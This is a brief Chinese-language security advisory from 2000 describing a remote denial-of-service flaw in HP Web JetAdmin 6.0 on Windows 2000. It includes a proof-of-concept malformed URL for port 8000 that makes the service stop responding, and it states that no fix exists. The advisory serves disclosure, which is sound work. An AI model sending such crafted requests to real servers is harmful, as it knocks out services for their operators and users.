HP Web JetAdmin Version 6.0 存在DOS攻击发布时间:2000-09-15 更新时间:2000-09-15 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 HP Web JetAdmin Version 6.0 (Microsoft Windows 2000)详细描述 默认的8000端口存在内存缓冲冲突,通过执行一段畸形的URL代码可以导致服务停止响应。 测试代码 如:原来的请求: http://SeverIp:8000/plugins/hpjwja/script/devices_list.hts?&obj=Httpd: GetProfile(new_list,__null,__null,$__hpjwja_ack_ini)(_deviceList)&clea rFilters=true&_refreshdevicelist=true&_special=new 如果改成下面的URL请求: http://ServerIp:8000/plugins/hpjwja/script/devices_list.hts?&obj=Httpd :GetProfile(new_list,__null,__null,$ 请产生一拒绝服务攻击,使服务停止响应。 解决方案 尚无 相关信息 |